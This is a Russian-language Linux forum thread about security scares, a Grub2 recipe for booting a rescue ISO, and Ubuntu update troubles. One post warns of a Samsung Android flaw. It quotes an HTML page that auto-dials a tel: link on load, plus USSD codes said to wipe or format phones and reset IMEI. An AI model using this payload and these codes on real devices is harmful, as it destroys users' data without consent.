IPB

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >  
Ответить в данную темуНачать новую тему
> Опасности для пингвинов, их мало, но бывают
?ELF
сообщение 17.3.2011, 8:58
Сообщение #1


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Цитата
http://www.opennet.ru/opennews/art.shtml?num=29834

Взлом Linux через подключение USB-устройства стал реальностью
08.03.2011 11:31

В USB-драйвере caiaq найдена уязвимость, позволяющая инициировать переполнение буфера и выполнение кода злоумышленника через подключение специально сконфигурированного USB-устройства к работающему под управлением Linux компьютеру.
Используя данную уязвимость, злоумышленник может воспользоваться имеющимися в продаже недорогими программируемыми USB-платами для организации выполнения своего кода c правами ядра Linux в любой системе к USB-порту которой он может получить доступ.

Приводящая к уязвимости ошибка представляет собой наиболее тривиальный вариант инициирования переполнения буфера, связанный с использованием для копирования содержимого строки небезопасной функции strcpy(), вместо учитывающего длину строки варианта strlcpy().
Эксплуатировать уязвимость можно через передачу превышающего 80 символов имени устройства в процессе обмена информацией на стадии инициализации.

Для создания устройства можно использовать отладочные USB-платы на базе микроконтроллеров серии AT90USB или ATMEGA32U4, стоимость которых составляет приблизительно 20$.
Именно эти платы в прошлом году использовались для организации взлома Sony PlayStation 3 через USB-порт.

Приводящая к уязвимости ошибка была исправлена в коде ядра в середине февраля.
Исправления вошли в состав ядер 2.6.37.2 и 2.6.38-rc4-next-20110215.
В выпущенном вчера обновлении ядра 2.6.32.32 присутствует исправление похожей ошибки в USB-драйвере iowarrior, поэтому не исключено, что в ближайшее время можно ожидать анонс уязвимости и в других драйверах.

В качестве временной защиты рекомендуется удалить из системы драйверы /lib/modules/2.6.*/kernel/sound/usb/caiaq/snd-usb-caiaq.ko и /lib/modules/2.6.*/kernel/drivers/usb/misc/iowarrior.ko.

Опасность, скорее, теоретическая.
Но, на серверах я бы грохнул указанные модули.
К чему на серваках драйверы USB-звуковух?
Перейти в начало страницы
 
+Цитировать сообщение
A.T.Tappman
сообщение 18.3.2011, 10:02
Сообщение #2


ЕРЖ-антисемит
***

Группа: Пользователи
Сообщений: 1900
Регистрация: 24.11.2009
Из: Великий Новгород
Пользователь №: 23



На сервере звук не нужен. Но, видимо, есть особо одарённые, которые используют.
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 19.3.2011, 2:33
Сообщение #3


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Цитата(GuruKiller @ 18.3.2011, 5:27) *
Опять ымбеддеры? smile.gif

Танунах! Какие Ымбеддеры...
В этом случае, или очень уставшие люди ("глаз замылился"), или попросту, обычные распиздяи.
Ещё ж в школе всех учили -- "насрал -- убери за собой" и "всегда контролируй длину ствола".

А сейчас пока -- чик по драйверу и ага -- "в колодце она лежит, сходи посмотри."©

---
Поломают и Linux (но, не каждый).
Была бы задача поставлена.
"Что у хорошего шофёра ржавеет, а у плохого блестит?"©
Так и здесь. biggrin.gif
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 10.6.2012, 22:18
Сообщение #4


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Тут такая штука.
Убунта 12.04 на нетбуке
Слишком часто слышу чудные звуки парковки головок винта - раз секунд в 3-5
Когда-то читаль про старую проблему убиения винтов из-за частой парковки, стал подозревать рецидив тсз.
Кто-нибудь может ткнуть носом в обсуждение проблемы (ключевых слов не помню)? Или это поцыкивание все-же в пределах нормы?
Спасибо!
Перейти в начало страницы
 
+Цитировать сообщение
petrov
сообщение 11.6.2012, 10:49
Сообщение #5


Активный участник
***

Группа: Пользователи
Сообщений: 93
Регистрация: 3.5.2011
Пользователь №: 357



Цитата(_pasha @ 10.6.2012, 23:18) *
Тут такая штука.
Убунта 12.04 на нетбуке
Слишком часто слышу чудные звуки парковки головок винта - раз секунд в 3-5
Когда-то читаль про старую проблему убиения винтов из-за частой парковки, стал подозревать рецидив тсз.
Кто-нибудь может ткнуть носом в обсуждение проблемы (ключевых слов не помню)? Или это поцыкивание все-же в пределах нормы?
Спасибо!


ИМХО умрёт быстрее, но больше всего это просто раздражает. Надо установить значение APM на 128 или выше, под винду есть простенькие программки для этого, про пингвинофф в гугле пишут


http://pingvinoff.net/2011/08/01/saving-hd...-laptop-part-2/
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 11.6.2012, 19:36
Сообщение #6


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Цитата(petrov @ 11.6.2012, 11:49) *

Спасибо. Пафосное "СПАСАЕМ" оказалось откровением smile.gif
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 26.7.2012, 15:56
Сообщение #7


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Ахтунг!
*nix-ы тоже могут попасть.

Кросс-платформенный троянец берет под контроль «маки» и компьютеры на базе Windows
Перейти в начало страницы
 
+Цитировать сообщение
Гость_MrYuran_*
сообщение 26.7.2012, 18:31
Сообщение #8





Гости






Зарегился в Ubuntu One, теперь я тоже в облаках smile.gif

Осталось купить убунтофон -или пад, и будем не хуже других.
Перейти в начало страницы
 
+Цитировать сообщение
kamil yaminov
сообщение 27.7.2012, 4:45
Сообщение #9


Активный участник
***

Группа: Пользователи
Сообщений: 704
Регистрация: 20.2.2011
Из: Новосибирск
Пользователь №: 337



а опосля регигстрации на убунтуоне на ланчпад пускает по тому же логину-паролю?

т еще, я что-то не нашел, он селективный синк поддерживает?
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 22.8.2012, 17:43
Сообщение #10


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Очередной ахтунг! biggrin.gif

Цитата
http://www.cnews.ru/top/2012/08/22/obnaruz...y_paroli_500198

Обнаружен первый троянец для Linux и Mac OS X, похищающий пароли
22.08.12, Ср, 16:30, Мск

А если на /home подвесить noexec?
т.е. 0600
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 21.9.2012, 16:27
Сообщение #11


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Оставлю-ка я это здесь.
Может, когда, кому пригодится.
О том, "как самому себя вытянуть из болота за волосы".
На примере Ubuntu 11.04 + Grub2.
Когда станцию строил, ничего более интересного не было (кроме Debian, но он мне не подошёл по паре параметров).

---
Сегодня утром, в непривычной суете и суматохе, грубо нарушил старинное правило:
Цитата
Никогда не накатывай обновления в понедельник и в пятницу.

Особенно, не посмотрев, что там в апдейтах прилетело и не вникнув в их суть.

Прилетели утром через "менеджер обновлений" следующие пакеты:
Цитата
dbus_1.4.6-1ubuntu6.2_amd64.deb
dbus-x11_1.4.6-1ubuntu6.2_amd64.deb
libdbus-1-3_1.4.6-1ubuntu6.2_amd64.deb
libdbus-1-dev_1.4.6-1ubuntu6.2_amd64.deb

после установки которых потребовалась перезагрузка.

После чего, при загрузке системы, вскрылась засада:
Цитата
No filesystem could mount root, tried: ext3 ext2 ext4 fuseblk
Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block (0,0)
Pid:1, comm: swapper Not tained 2.6.38-16-generic #67-Ubuntu

Далее, естественно, последовала остановка компьютера.
А станция нужна была... только-только рабочий день начинался и традиционная туча звонков, вопросов, просьб, задач.

Пришлось грузиться при помощи Grub с установочного iso-шника, смотреть логи и пытаться понять проблему.
Посмотрел содержание вновь полученных deb-пакетов, посмотрел изменённые файлы.
Почему-то в /etc/fstab пропала запись с UUID и вместо неё появилась строка в старом формате /dev/sda5.
Переписал, как надо.

Далее выполнил:
Цитата
$ sudo mount /dev/sda2 /mnt ---> это "root" раздел в упавшей системе
$ sudo mount /dev/sda1 /mnt/boot
$ sudo mount /dev/sda5 /mnt/tmp
$ sudo mount /dev/sda6 /mnt/var
$ sudo mount /dev/sda7 /mnt/usr
$ sudo mount --bind /dev/ /mnt/dev
$ sudo mount --bind /proc/ /mnt/proc

$ sudo chroot /mnt
$ sudo update-initramfs -u

Загрузил систему в "режиме восстановления" и выполнил:
Цитата
$ sudo update-grub

Загрузил систему в обычном режиме.
Всё пучком.

Возможно (?), после установки обновлений не было автоматически выполнено
Цитата
# update-initramfs

Причину косяка я не понял, не было времени.

О главном.
Оно меня сегодня здорово выручило. smile.gif

Когда:
-- в станции (или ноуте) нет CD-DVD-привода,
-- или когда нет нарезанного сидюка с LiveCD,
-- или когда есть *.iso, но нет под рукой пустой матрицы,
-- или когда записать *.iso на матрицу нечем,
-- или просто лень этим заниматься,
-- или нет в сети tftp сервера с настроенной nfs (или лень конфигурить),

может выручить загрузка с *.iso через Grub2 (если, конечно, он живой).

Правда, для этого предварительно (до возникновения проблем) надо о себе позаботиться.
Описана эта процедура во многих местах, но у нас, вроде, не было.

1) при установке системы желательно создать отдельный раздел /boot
2) в разделе /boot создать каталог, допустим, iso (чтобы в него можно было напихать разных iso-шников, на все случаи жизни -- PartedMagic, DEFT & etc и не мусорить в корне)
3) в /boot/iso скопировать файл ubuntu-11.04-desktop-amd64.iso
4) в /etc/grub.d/40_custom прописать:
Цитата
menuentry "ISO - Ubuntu-11.04-desktop-amd64" {
loopback loop (hd0,1)/iso/ubuntu-11.04-desktop-amd64.iso
set root=(loop)
linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/iso/ubuntu-11.04-desktop-amd64.iso noprompt noeject
initrd (loop)/casper/initrd.lz
}

(hd0,1)
"0" -- мой загрузочный диск
"1" -- первый раздел на диске -- мой раздел /boot

после внесения изменений в /etc/grub.d/40_custom выполнить:
Цитата
$ sudo update-grub

При загрузке в меню Grub2 появится новый пункт "ISO - Ubuntu-11.04-desktop-amd64".
Перейти в начало страницы
 
+Цитировать сообщение
kamil yaminov
сообщение 21.9.2012, 19:36
Сообщение #12


Активный участник
***

Группа: Пользователи
Сообщений: 704
Регистрация: 20.2.2011
Из: Новосибирск
Пользователь №: 337



Доброго здравия! Надо у себя тоже iso-шник положить, спасиббо за наводку.

Кстати, сегодня обновился, вроде тьфу-тьфу все хорошо, вообще 12.04 меня поражает своей стабильность ) после предыдущих версий
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 26.9.2012, 5:46
Сообщение #13


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Внимание, у кого смарты с Андроидом!

Серьёзный баг на днях расковыряли.
Попасть в засаду можно просто сфотографировав QR-код.
Необходимо накатить патчи (если кто-то кроме Samsung их выпустил).
Цитата
http://habrahabr.ru/post/152209/

На конференции по безопасности продемонстрировали, как одной строкой HTML кода можно удаленно удалить данные с Samsung Galaxy S III.

Хуже всего: это, кажется, работает на многих смартфонах Samsung с TouchWiz

Данные эксплойт в виде строки HTML кода также может быть вызвать через встроенный сканер QR кодов или NFC.

<...>

HTC One X тоже уязвим. Только что на своем проверил.

<...>

HTC hero c 2.1, HTC Tattoo с 1.6, HTC Desire и так далее


Цитата
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
</head>
<body>
<a onclick="document.location='tel:*%2306%23'" id="link" />Call me</a>
<script>
$(document).ready(function() {
$('#link').click();
});
</script>
</body>
</html>



Цитата
tel:*%2306%23 -- запрос IMEI
tel: *#*#7780#*#* -- wipe
tel: *#767*3855# -- форматирование разделов
tel: *2767*3855# — Полный сброс IEEPROM
( Этот код удаляет SP-блокировку!)
Но также изменяет IMEI на 447967-89-400044-0


---

Цитата
http://habrahabr.ru/post/152209/#comment_5171865

Выходит любой ussd запрос можно без запроса пользователя отправить — «хороший» способ для подписки к «нужным» мобильным услугам…

smile.gif
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 26.9.2012, 7:12
Сообщение #14


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Цитата
tel: *#*#7780#*#* -- wipe

Что такое wipe?
***
Сейчас пошла волна убунтовых обновлений, которая повергает меня в тоску. Перезагрузился - отвалился wifi - оказалось, видимо, кто-то решил, что если в setup'е установлено при старте "always off", то связь запрещена вообще и включить позже ее хоткеем невозможно. alcoholic.gif
Перейти в начало страницы
 
+Цитировать сообщение
?ELF
сообщение 26.9.2012, 7:20
Сообщение #15


шаражник по жизни, рядовой
***

Группа: недомод :)
Сообщений: 5484
Регистрация: 24.11.2009
Из: Россия, Челябинская область
Пользователь №: 26



Цитата(_pasha @ 26.9.2012, 11:12) *
Что такое wipe?

Secure file deletion.

Что-то типа шредера получается.
Похоже, андроидные производители, как и яблочники, оставили лазейку для удалённой зачистки тела в случае кражи.
Перейти в начало страницы
 
+Цитировать сообщение
kamil yaminov
сообщение 26.9.2012, 13:16
Сообщение #16


Активный участник
***

Группа: Пользователи
Сообщений: 704
Регистрация: 20.2.2011
Из: Новосибирск
Пользователь №: 337



Цитата(_pasha @ 26.9.2012, 12:12) *
Что такое wipe?
***
Сейчас пошла волна убунтовых обновлений, которая повергает меня в тоску. Перезагрузился - отвалился wifi - оказалось, видимо, кто-то решил, что если в setup'е установлено при старте "always off", то связь запрещена вообще и включить позже ее хоткеем невозможно. alcoholic.gif

А какая версия? у меня 1204 железно работает уже как полгода без всяких смертельных глюков
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 26.9.2012, 13:20
Сообщение #17


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Цитата(kamil yaminov @ 26.9.2012, 14:16) *
А какая версия? у меня 1204 железно работает уже как полгода без всяких смертельных глюков

1204 с накатанным xfce4
Такой уж железной стабильности - нету.
Перейти в начало страницы
 
+Цитировать сообщение
kamil yaminov
сообщение 26.9.2012, 14:03
Сообщение #18


Активный участник
***

Группа: Пользователи
Сообщений: 704
Регистрация: 20.2.2011
Из: Новосибирск
Пользователь №: 337



У меня unity, из самых страшных глюков - очень редко, всего два-три раза было не подгружались виртуалбоксовские модули после обновлений, делал вручную или перезагрузкой. Правда различого софта у меня не сильно много установлено. Но сейчас. в командировке, стараюсь не обновляться от греха подальше
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 29.9.2012, 16:42
Сообщение #19


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Поломался десктоп, тот что xfce. Кто знает, как его быстро и аккуратно вычистить и обновить? Установки/переустановки не помогают. Уже подумываю, а не перезалить ли не всё по новой... Это все обновления, блин.
Перейти в начало страницы
 
+Цитировать сообщение
_pasha
сообщение 29.9.2012, 18:57
Сообщение #20


тот самый
Иконка группы

Группа: Мод
Сообщений: 13629
Регистрация: 24.11.2009
Из: Харьковская обл., UA
Пользователь №: 25



Блять!!! Перезалил десктоп полностью xubuntu.
Заработало.
Цитата
Никогда не накатывай обновления в понедельник и в пятницу.

Истина. Я вчера мучался с отладчиком для STM32, понаставлял в горячке, видать, чего-то.
Перейти в начало страницы
 
+Цитировать сообщение

2 страниц V   1 2 >
Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Текстовая версия Сейчас: 28.3.2024, 14:27